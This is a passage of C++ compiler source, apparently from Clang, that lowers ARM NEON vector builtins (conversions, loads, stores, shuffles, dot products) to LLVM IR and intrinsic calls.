case NEON::BI__builtin_neon_vaddhn_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
// %sum = add <4 x i32> %lhs, %rhs
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
Ops[1] = Builder.CreateBitCast(Ops[1], SrcTy);
Ops[0] = Builder.CreateAdd(Ops[0], Ops[1], "vaddhn");
// %high = lshr <4 x i32> %sum, <i32 16, i32 16, i32 16, i32 16>
Constant *ShiftAmt =
ConstantInt::get(SrcTy, SrcTy->getScalarSizeInBits() / 2);
Ops[0] = Builder.CreateLShr(Ops[0], ShiftAmt, "vaddhn");
// %res = trunc <4 x i32> %high to <4 x i16>
return Builder.CreateTrunc(Ops[0], VTy, "vaddhn");
}
case NEON::BI__builtin_neon_vcale_v:
case NEON::BI__builtin_neon_vcaleq_v:
case NEON::BI__builtin_neon_vcalt_v:
case NEON::BI__builtin_neon_vcaltq_v:
std::swap(Ops[0], Ops[1]);
LLVM_FALLTHROUGH;
case NEON::BI__builtin_neon_vcage_v:
case NEON::BI__builtin_neon_vcageq_v:
case NEON::BI__builtin_neon_vcagt_v:
case NEON::BI__builtin_neon_vcagtq_v: {
llvm::Type *Ty;
switch (VTy->getScalarSizeInBits()) {
default: llvm_unreachable("unexpected type");
case 32:
Ty = FloatTy;
break;
case 64:
Ty = DoubleTy;
break;
case 16:
Ty = HalfTy;
break;
}
auto *VecFlt = llvm::FixedVectorType::get(Ty, VTy->getNumElements());
llvm::Type *Tys[] = { VTy, VecFlt };
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
return EmitNeonCall(F, Ops, NameHint);
}
case NEON::BI__builtin_neon_vceqz_v:
case NEON::BI__builtin_neon_vceqzq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OEQ,
ICmpInst::ICMP_EQ, "vceqz");
case NEON::BI__builtin_neon_vcgez_v:
case NEON::BI__builtin_neon_vcgezq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OGE,
ICmpInst::ICMP_SGE, "vcgez");
case NEON::BI__builtin_neon_vclez_v:
case NEON::BI__builtin_neon_vclezq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OLE,
ICmpInst::ICMP_SLE, "vclez");
case NEON::BI__builtin_neon_vcgtz_v:
case NEON::BI__builtin_neon_vcgtzq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OGT,
ICmpInst::ICMP_SGT, "vcgtz");
case NEON::BI__builtin_neon_vcltz_v:
case NEON::BI__builtin_neon_vcltzq_v:
return EmitAArch64CompareBuiltinExpr(Ops[0], Ty, ICmpInst::FCMP_OLT,
ICmpInst::ICMP_SLT, "vcltz");
case NEON::BI__builtin_neon_vclz_v:
case NEON::BI__builtin_neon_vclzq_v:
// We generate target-independent intrinsic, which needs a second argument
// for whether or not clz of zero is undefined; on ARM it isn't.
Ops.push_back(Builder.getInt1(getTarget().isCLZForZeroUndef()));
break;
case NEON::BI__builtin_neon_vcvt_f32_v:
case NEON::BI__builtin_neon_vcvtq_f32_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ty = GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float32, false, Quad),
HasLegalHalfType);
return Usgn ? Builder.CreateUIToFP(Ops[0], Ty, "vcvt")
: Builder.CreateSIToFP(Ops[0], Ty, "vcvt");
case NEON::BI__builtin_neon_vcvt_f16_v:
case NEON::BI__builtin_neon_vcvtq_f16_v:
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ty = GetNeonType(this, NeonTypeFlags(NeonTypeFlags::Float16, false, Quad),
HasLegalHalfType);
return Usgn ? Builder.CreateUIToFP(Ops[0], Ty, "vcvt")
: Builder.CreateSIToFP(Ops[0], Ty, "vcvt");
case NEON::BI__builtin_neon_vcvt_n_f16_v:
case NEON::BI__builtin_neon_vcvt_n_f32_v:
case NEON::BI__builtin_neon_vcvt_n_f64_v:
case NEON::BI__builtin_neon_vcvtq_n_f16_v:
case NEON::BI__builtin_neon_vcvtq_n_f32_v:
case NEON::BI__builtin_neon_vcvtq_n_f64_v: {
llvm::Type *Tys[2] = { GetFloatNeonType(this, Type), Ty };
Int = Usgn ? LLVMIntrinsic : AltLLVMIntrinsic;
Function *F = CGM.getIntrinsic(Int, Tys);
return EmitNeonCall(F, Ops, "vcvt_n");
}
case NEON::BI__builtin_neon_vcvt_n_s16_v:
case NEON::BI__builtin_neon_vcvt_n_s32_v:
case NEON::BI__builtin_neon_vcvt_n_u16_v:
case NEON::BI__builtin_neon_vcvt_n_u32_v:
case NEON::BI__builtin_neon_vcvt_n_s64_v:
case NEON::BI__builtin_neon_vcvt_n_u64_v:
case NEON::BI__builtin_neon_vcvtq_n_s16_v:
case NEON::BI__builtin_neon_vcvtq_n_s32_v:
case NEON::BI__builtin_neon_vcvtq_n_u16_v:
case NEON::BI__builtin_neon_vcvtq_n_u32_v:
case NEON::BI__builtin_neon_vcvtq_n_s64_v:
case NEON::BI__builtin_neon_vcvtq_n_u64_v: {
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
return EmitNeonCall(F, Ops, "vcvt_n");
}
case NEON::BI__builtin_neon_vcvt_s32_v:
case NEON::BI__builtin_neon_vcvt_u32_v:
case NEON::BI__builtin_neon_vcvt_s64_v:
case NEON::BI__builtin_neon_vcvt_u64_v:
case NEON::BI__builtin_neon_vcvt_s16_v:
case NEON::BI__builtin_neon_vcvt_u16_v:
case NEON::BI__builtin_neon_vcvtq_s32_v:
case NEON::BI__builtin_neon_vcvtq_u32_v:
case NEON::BI__builtin_neon_vcvtq_s64_v:
case NEON::BI__builtin_neon_vcvtq_u64_v:
case NEON::BI__builtin_neon_vcvtq_s16_v:
case NEON::BI__builtin_neon_vcvtq_u16_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], GetFloatNeonType(this, Type));
return Usgn ? Builder.CreateFPToUI(Ops[0], Ty, "vcvt")
: Builder.CreateFPToSI(Ops[0], Ty, "vcvt");
}
case NEON::BI__builtin_neon_vcvta_s16_v:
case NEON::BI__builtin_neon_vcvta_s32_v:
case NEON::BI__builtin_neon_vcvta_s64_v:
case NEON::BI__builtin_neon_vcvta_u16_v:
case NEON::BI__builtin_neon_vcvta_u32_v:
case NEON::BI__builtin_neon_vcvta_u64_v:
case NEON::BI__builtin_neon_vcvtaq_s16_v:
case NEON::BI__builtin_neon_vcvtaq_s32_v:
case NEON::BI__builtin_neon_vcvtaq_s64_v:
case NEON::BI__builtin_neon_vcvtaq_u16_v:
case NEON::BI__builtin_neon_vcvtaq_u32_v:
case NEON::BI__builtin_neon_vcvtaq_u64_v:
case NEON::BI__builtin_neon_vcvtn_s16_v:
case NEON::BI__builtin_neon_vcvtn_s32_v:
case NEON::BI__builtin_neon_vcvtn_s64_v:
case NEON::BI__builtin_neon_vcvtn_u16_v:
case NEON::BI__builtin_neon_vcvtn_u32_v:
case NEON::BI__builtin_neon_vcvtn_u64_v:
case NEON::BI__builtin_neon_vcvtnq_s16_v:
case NEON::BI__builtin_neon_vcvtnq_s32_v:
case NEON::BI__builtin_neon_vcvtnq_s64_v:
case NEON::BI__builtin_neon_vcvtnq_u16_v:
case NEON::BI__builtin_neon_vcvtnq_u32_v:
case NEON::BI__builtin_neon_vcvtnq_u64_v:
case NEON::BI__builtin_neon_vcvtp_s16_v:
case NEON::BI__builtin_neon_vcvtp_s32_v:
case NEON::BI__builtin_neon_vcvtp_s64_v:
case NEON::BI__builtin_neon_vcvtp_u16_v:
case NEON::BI__builtin_neon_vcvtp_u32_v:
case NEON::BI__builtin_neon_vcvtp_u64_v:
case NEON::BI__builtin_neon_vcvtpq_s16_v:
case NEON::BI__builtin_neon_vcvtpq_s32_v:
case NEON::BI__builtin_neon_vcvtpq_s64_v:
case NEON::BI__builtin_neon_vcvtpq_u16_v:
case NEON::BI__builtin_neon_vcvtpq_u32_v:
case NEON::BI__builtin_neon_vcvtpq_u64_v:
case NEON::BI__builtin_neon_vcvtm_s16_v:
case NEON::BI__builtin_neon_vcvtm_s32_v:
case NEON::BI__builtin_neon_vcvtm_s64_v:
case NEON::BI__builtin_neon_vcvtm_u16_v:
case NEON::BI__builtin_neon_vcvtm_u32_v:
case NEON::BI__builtin_neon_vcvtm_u64_v:
case NEON::BI__builtin_neon_vcvtmq_s16_v:
case NEON::BI__builtin_neon_vcvtmq_s32_v:
case NEON::BI__builtin_neon_vcvtmq_s64_v:
case NEON::BI__builtin_neon_vcvtmq_u16_v:
case NEON::BI__builtin_neon_vcvtmq_u32_v:
case NEON::BI__builtin_neon_vcvtmq_u64_v: {
llvm::Type *Tys[2] = { Ty, GetFloatNeonType(this, Type) };
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vcvtx_f32_v: {
llvm::Type *Tys[2] = { VTy->getTruncatedElementVectorType(VTy), Ty};
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vext_v:
case NEON::BI__builtin_neon_vextq_v: {
int CV = cast<ConstantInt>(Ops[2])->getSExtValue();
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; ++i)
Indices.push_back(i+CV);
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
return Builder.CreateShuffleVector(Ops[0], Ops[1], Indices, "vext");
}
case NEON::BI__builtin_neon_vfma_v:
case NEON::BI__builtin_neon_vfmaq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
// NEON intrinsic puts accumulator first, unlike the LLVM fma.
return emitCallMaybeConstrainedFPBuiltin(
*this, Intrinsic::fma, Intrinsic::experimental_constrained_fma, Ty,
{Ops[1], Ops[2], Ops[0]});
}
case NEON::BI__builtin_neon_vld1_v:
case NEON::BI__builtin_neon_vld1q_v: {
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Ops.push_back(getAlignmentValue32(PtrOp0));
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, "vld1");
}
case NEON::BI__builtin_neon_vld1_x2_v:
case NEON::BI__builtin_neon_vld1q_x2_v:
case NEON::BI__builtin_neon_vld1_x3_v:
case NEON::BI__builtin_neon_vld1q_x3_v:
case NEON::BI__builtin_neon_vld1_x4_v:
case NEON::BI__builtin_neon_vld1q_x4_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy->getElementType());
Ops[1] = Builder.CreateBitCast(Ops[1], PTy);
llvm::Type *Tys[2] = { VTy, PTy };
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
Ops[1] = Builder.CreateCall(F, Ops[1], "vld1xN");
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld2_v:
case NEON::BI__builtin_neon_vld2q_v:
case NEON::BI__builtin_neon_vld3_v:
case NEON::BI__builtin_neon_vld3q_v:
case NEON::BI__builtin_neon_vld4_v:
case NEON::BI__builtin_neon_vld4q_v:
case NEON::BI__builtin_neon_vld2_dup_v:
case NEON::BI__builtin_neon_vld2q_dup_v:
case NEON::BI__builtin_neon_vld3_dup_v:
case NEON::BI__builtin_neon_vld3q_dup_v:
case NEON::BI__builtin_neon_vld4_dup_v:
case NEON::BI__builtin_neon_vld4q_dup_v: {
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
Value *Align = getAlignmentValue32(PtrOp1);
Ops[1] = Builder.CreateCall(F, {Ops[1], Align}, NameHint);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vld1_dup_v:
case NEON::BI__builtin_neon_vld1q_dup_v: {
Value *V = UndefValue::get(Ty);
Ty = llvm::PointerType::getUnqual(VTy->getElementType());
PtrOp0 = Builder.CreateBitCast(PtrOp0, Ty);
LoadInst *Ld = Builder.CreateLoad(PtrOp0);
llvm::Constant *CI = ConstantInt::get(SizeTy, 0);
Ops[0] = Builder.CreateInsertElement(V, Ld, CI);
return EmitNeonSplat(Ops[0], CI);
}
case NEON::BI__builtin_neon_vld2_lane_v:
case NEON::BI__builtin_neon_vld2q_lane_v:
case NEON::BI__builtin_neon_vld3_lane_v:
case NEON::BI__builtin_neon_vld3q_lane_v:
case NEON::BI__builtin_neon_vld4_lane_v:
case NEON::BI__builtin_neon_vld4q_lane_v: {
llvm::Type *Tys[] = {Ty, Int8PtrTy};
Function *F = CGM.getIntrinsic(LLVMIntrinsic, Tys);
for (unsigned I = 2; I < Ops.size() - 1; ++I)
Ops[I] = Builder.CreateBitCast(Ops[I], Ty);
Ops.push_back(getAlignmentValue32(PtrOp1));
Ops[1] = Builder.CreateCall(F, makeArrayRef(Ops).slice(1), NameHint);
Ty = llvm::PointerType::getUnqual(Ops[1]->getType());
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
return Builder.CreateDefaultAlignedStore(Ops[1], Ops[0]);
}
case NEON::BI__builtin_neon_vmovl_v: {
llvm::FixedVectorType *DTy =
llvm::FixedVectorType::getTruncatedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], DTy);
if (Usgn)
return Builder.CreateZExt(Ops[0], Ty, "vmovl");
return Builder.CreateSExt(Ops[0], Ty, "vmovl");
}
case NEON::BI__builtin_neon_vmovn_v: {
llvm::FixedVectorType *QTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], QTy);
return Builder.CreateTrunc(Ops[0], Ty, "vmovn");
}
case NEON::BI__builtin_neon_vmull_v:
// FIXME: the integer vmull operations could be emitted in terms of pure
// LLVM IR (2 exts followed by a mul). Unfortunately LLVM has a habit of
// hoisting the exts outside loops. Until global ISel comes along that can
// see through such movement this leads to bad CodeGen. So we need an
// intrinsic for now.
Int = Usgn ? Intrinsic::arm_neon_vmullu : Intrinsic::arm_neon_vmulls;
Int = Type.isPoly() ? (unsigned)Intrinsic::arm_neon_vmullp : Int;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vmull");
case NEON::BI__builtin_neon_vpadal_v:
case NEON::BI__builtin_neon_vpadalq_v: {
// The source operand type has twice as many elements of half the size.
unsigned EltBits = VTy->getElementType()->getPrimitiveSizeInBits();
llvm::Type *EltTy =
llvm::IntegerType::get(getLLVMContext(), EltBits / 2);
auto *NarrowTy =
llvm::FixedVectorType::get(EltTy, VTy->getNumElements() * 2);
llvm::Type *Tys[2] = { Ty, NarrowTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vpaddl_v:
case NEON::BI__builtin_neon_vpaddlq_v: {
// The source operand type has twice as many elements of half the size.
unsigned EltBits = VTy->getElementType()->getPrimitiveSizeInBits();
llvm::Type *EltTy = llvm::IntegerType::get(getLLVMContext(), EltBits / 2);
auto *NarrowTy =
llvm::FixedVectorType::get(EltTy, VTy->getNumElements() * 2);
llvm::Type *Tys[2] = { Ty, NarrowTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vpaddl");
}
case NEON::BI__builtin_neon_vqdmlal_v:
case NEON::BI__builtin_neon_vqdmlsl_v: {
SmallVector<Value *, 2> MulOps(Ops.begin() + 1, Ops.end());
Ops[1] =
EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Ty), MulOps, "vqdmlal");
Ops.resize(2);
return EmitNeonCall(CGM.getIntrinsic(AltLLVMIntrinsic, Ty), Ops, NameHint);
}
case NEON::BI__builtin_neon_vqdmulhq_lane_v:
case NEON::BI__builtin_neon_vqdmulh_lane_v:
case NEON::BI__builtin_neon_vqrdmulhq_lane_v:
case NEON::BI__builtin_neon_vqrdmulh_lane_v: {
auto *RTy = cast<llvm::FixedVectorType>(Ty);
if (BuiltinID == NEON::BI__builtin_neon_vqdmulhq_lane_v ||
BuiltinID == NEON::BI__builtin_neon_vqrdmulhq_lane_v)
RTy = llvm::FixedVectorType::get(RTy->getElementType(),
RTy->getNumElements() * 2);
llvm::Type *Tys[2] = {
RTy, GetNeonType(this, NeonTypeFlags(Type.getEltType(), false,
/*isQuad*/ false))};
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vqdmulhq_laneq_v:
case NEON::BI__builtin_neon_vqdmulh_laneq_v:
case NEON::BI__builtin_neon_vqrdmulhq_laneq_v:
case NEON::BI__builtin_neon_vqrdmulh_laneq_v: {
llvm::Type *Tys[2] = {
Ty, GetNeonType(this, NeonTypeFlags(Type.getEltType(), false,
/*isQuad*/ true))};
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, NameHint);
}
case NEON::BI__builtin_neon_vqshl_n_v:
case NEON::BI__builtin_neon_vqshlq_n_v:
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshl_n",
1, false);
case NEON::BI__builtin_neon_vqshlu_n_v:
case NEON::BI__builtin_neon_vqshluq_n_v:
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vqshlu_n",
1, false);
case NEON::BI__builtin_neon_vrecpe_v:
case NEON::BI__builtin_neon_vrecpeq_v:
case NEON::BI__builtin_neon_vrsqrte_v:
case NEON::BI__builtin_neon_vrsqrteq_v:
Int = Ty->isFPOrFPVectorTy() ? LLVMIntrinsic : AltLLVMIntrinsic;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, NameHint);
case NEON::BI__builtin_neon_vrndi_v:
case NEON::BI__builtin_neon_vrndiq_v:
Int = Builder.getIsFPConstrained()
? Intrinsic::experimental_constrained_nearbyint
: Intrinsic::nearbyint;
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, NameHint);
case NEON::BI__builtin_neon_vrshr_n_v:
case NEON::BI__builtin_neon_vrshrq_n_v:
return EmitNeonCall(CGM.getIntrinsic(Int, Ty), Ops, "vrshr_n",
1, true);
case NEON::BI__builtin_neon_vsha512hq_v:
case NEON::BI__builtin_neon_vsha512h2q_v:
case NEON::BI__builtin_neon_vsha512su0q_v:
case NEON::BI__builtin_neon_vsha512su1q_v: {
Function *F = CGM.getIntrinsic(Int);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vshl_n_v:
case NEON::BI__builtin_neon_vshlq_n_v:
Ops[1] = EmitNeonShiftVector(Ops[1], Ty, false);
return Builder.CreateShl(Builder.CreateBitCast(Ops[0],Ty), Ops[1],
"vshl_n");
case NEON::BI__builtin_neon_vshll_n_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getTruncatedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
if (Usgn)
Ops[0] = Builder.CreateZExt(Ops[0], VTy);
else
Ops[0] = Builder.CreateSExt(Ops[0], VTy);
Ops[1] = EmitNeonShiftVector(Ops[1], VTy, false);
return Builder.CreateShl(Ops[0], Ops[1], "vshll_n");
}
case NEON::BI__builtin_neon_vshrn_n_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
Ops[1] = EmitNeonShiftVector(Ops[1], SrcTy, false);
if (Usgn)
Ops[0] = Builder.CreateLShr(Ops[0], Ops[1]);
else
Ops[0] = Builder.CreateAShr(Ops[0], Ops[1]);
return Builder.CreateTrunc(Ops[0], Ty, "vshrn_n");
}
case NEON::BI__builtin_neon_vshr_n_v:
case NEON::BI__builtin_neon_vshrq_n_v:
return EmitNeonRShiftImm(Ops[0], Ops[1], Ty, Usgn, "vshr_n");
case NEON::BI__builtin_neon_vst1_v:
case NEON::BI__builtin_neon_vst1q_v:
case NEON::BI__builtin_neon_vst2_v:
case NEON::BI__builtin_neon_vst2q_v:
case NEON::BI__builtin_neon_vst3_v:
case NEON::BI__builtin_neon_vst3q_v:
case NEON::BI__builtin_neon_vst4_v:
case NEON::BI__builtin_neon_vst4q_v:
case NEON::BI__builtin_neon_vst2_lane_v:
case NEON::BI__builtin_neon_vst2q_lane_v:
case NEON::BI__builtin_neon_vst3_lane_v:
case NEON::BI__builtin_neon_vst3q_lane_v:
case NEON::BI__builtin_neon_vst4_lane_v:
case NEON::BI__builtin_neon_vst4q_lane_v: {
llvm::Type *Tys[] = {Int8PtrTy, Ty};
Ops.push_back(getAlignmentValue32(PtrOp0));
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "");
}
case NEON::BI__builtin_neon_vsm3partw1q_v:
case NEON::BI__builtin_neon_vsm3partw2q_v:
case NEON::BI__builtin_neon_vsm3ss1q_v:
case NEON::BI__builtin_neon_vsm4ekeyq_v:
case NEON::BI__builtin_neon_vsm4eq_v: {
Function *F = CGM.getIntrinsic(Int);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vsm3tt1aq_v:
case NEON::BI__builtin_neon_vsm3tt1bq_v:
case NEON::BI__builtin_neon_vsm3tt2aq_v:
case NEON::BI__builtin_neon_vsm3tt2bq_v: {
Function *F = CGM.getIntrinsic(Int);
Ops[3] = Builder.CreateZExt(Ops[3], Int64Ty);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vst1_x2_v:
case NEON::BI__builtin_neon_vst1q_x2_v:
case NEON::BI__builtin_neon_vst1_x3_v:
case NEON::BI__builtin_neon_vst1q_x3_v:
case NEON::BI__builtin_neon_vst1_x4_v:
case NEON::BI__builtin_neon_vst1q_x4_v: {
llvm::Type *PTy = llvm::PointerType::getUnqual(VTy->getElementType());
// TODO: Currently in AArch32 mode the pointer operand comes first, whereas
// in AArch64 it comes last. We may want to stick to one or another.
if (Arch == llvm::Triple::aarch64 || Arch == llvm::Triple::aarch64_be ||
Arch == llvm::Triple::aarch64_32) {
llvm::Type *Tys[2] = { VTy, PTy };
std::rotate(Ops.begin(), Ops.begin() + 1, Ops.end());
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, "");
}
llvm::Type *Tys[2] = { PTy, VTy };
return EmitNeonCall(CGM.getIntrinsic(LLVMIntrinsic, Tys), Ops, "");
}
case NEON::BI__builtin_neon_vsubhn_v: {
llvm::FixedVectorType *SrcTy =
llvm::FixedVectorType::getExtendedElementVectorType(VTy);
// %sum = add <4 x i32> %lhs, %rhs
Ops[0] = Builder.CreateBitCast(Ops[0], SrcTy);
Ops[1] = Builder.CreateBitCast(Ops[1], SrcTy);
Ops[0] = Builder.CreateSub(Ops[0], Ops[1], "vsubhn");
// %high = lshr <4 x i32> %sum, <i32 16, i32 16, i32 16, i32 16>
Constant *ShiftAmt =
ConstantInt::get(SrcTy, SrcTy->getScalarSizeInBits() / 2);
Ops[0] = Builder.CreateLShr(Ops[0], ShiftAmt, "vsubhn");
// %res = trunc <4 x i32> %high to <4 x i16>
return Builder.CreateTrunc(Ops[0], VTy, "vsubhn");
}
case NEON::BI__builtin_neon_vtrn_v:
case NEON::BI__builtin_neon_vtrnq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back(i+vi);
Indices.push_back(i+e+vi);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vtrn");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vtst_v:
case NEON::BI__builtin_neon_vtstq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], Ty);
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[0] = Builder.CreateAnd(Ops[0], Ops[1]);
Ops[0] = Builder.CreateICmp(ICmpInst::ICMP_NE, Ops[0],
ConstantAggregateZero::get(Ty));
return Builder.CreateSExt(Ops[0], Ty, "vtst");
}
case NEON::BI__builtin_neon_vuzp_v:
case NEON::BI__builtin_neon_vuzpq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; ++i)
Indices.push_back(2*i+vi);
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vuzp");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vxarq_v: {
Function *F = CGM.getIntrinsic(Int);
Ops[2] = Builder.CreateZExt(Ops[2], Int64Ty);
return EmitNeonCall(F, Ops, "");
}
case NEON::BI__builtin_neon_vzip_v:
case NEON::BI__builtin_neon_vzipq_v: {
Ops[0] = Builder.CreateBitCast(Ops[0], llvm::PointerType::getUnqual(Ty));
Ops[1] = Builder.CreateBitCast(Ops[1], Ty);
Ops[2] = Builder.CreateBitCast(Ops[2], Ty);
Value *SV = nullptr;
for (unsigned vi = 0; vi != 2; ++vi) {
SmallVector<int, 16> Indices;
for (unsigned i = 0, e = VTy->getNumElements(); i != e; i += 2) {
Indices.push_back((i + vi*e) >> 1);
Indices.push_back(((i + vi*e) >> 1)+e);
}
Value *Addr = Builder.CreateConstInBoundsGEP1_32(Ty, Ops[0], vi);
SV = Builder.CreateShuffleVector(Ops[1], Ops[2], Indices, "vzip");
SV = Builder.CreateDefaultAlignedStore(SV, Addr);
}
return SV;
}
case NEON::BI__builtin_neon_vdot_v:
case NEON::BI__builtin_neon_vdotq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
Int = Usgn ? LLVMIntrinsic : AltLLVMIntrinsic;
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vdot");
}
case NEON::BI__builtin_neon_vfmlal_low_v:
case NEON::BI__builtin_neon_vfmlalq_low_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlal_low");
}
case NEON::BI__builtin_neon_vfmlsl_low_v:
case NEON::BI__builtin_neon_vfmlslq_low_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlsl_low");
}
case NEON::BI__builtin_neon_vfmlal_high_v:
case NEON::BI__builtin_neon_vfmlalq_high_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlal_high");
}
case NEON::BI__builtin_neon_vfmlsl_high_v:
case NEON::BI__builtin_neon_vfmlslq_high_v: {
auto *InputTy =
llvm::FixedVectorType::get(HalfTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vfmlsl_high");
}
case NEON::BI__builtin_neon_vmmlaq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
Int = Usgn ? LLVMIntrinsic : AltLLVMIntrinsic;
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vmmla");
}
case NEON::BI__builtin_neon_vusmmlaq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vusmmla");
}
case NEON::BI__builtin_neon_vusdot_v:
case NEON::BI__builtin_neon_vusdotq_v: {
auto *InputTy =
llvm::FixedVectorType::get(Int8Ty, Ty->getPrimitiveSizeInBits() / 8);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vusdot");
}
case NEON::BI__builtin_neon_vbfdot_v:
case NEON::BI__builtin_neon_vbfdotq_v: {
llvm::Type *InputTy =
llvm::FixedVectorType::get(BFloatTy, Ty->getPrimitiveSizeInBits() / 16);
llvm::Type *Tys[2] = { Ty, InputTy };
return EmitNeonCall(CGM.getIntrinsic(Int, Tys), Ops, "vbfdot");
}
case NEON::BI__builtin_neon___a32_vcvt_bf16_v: {
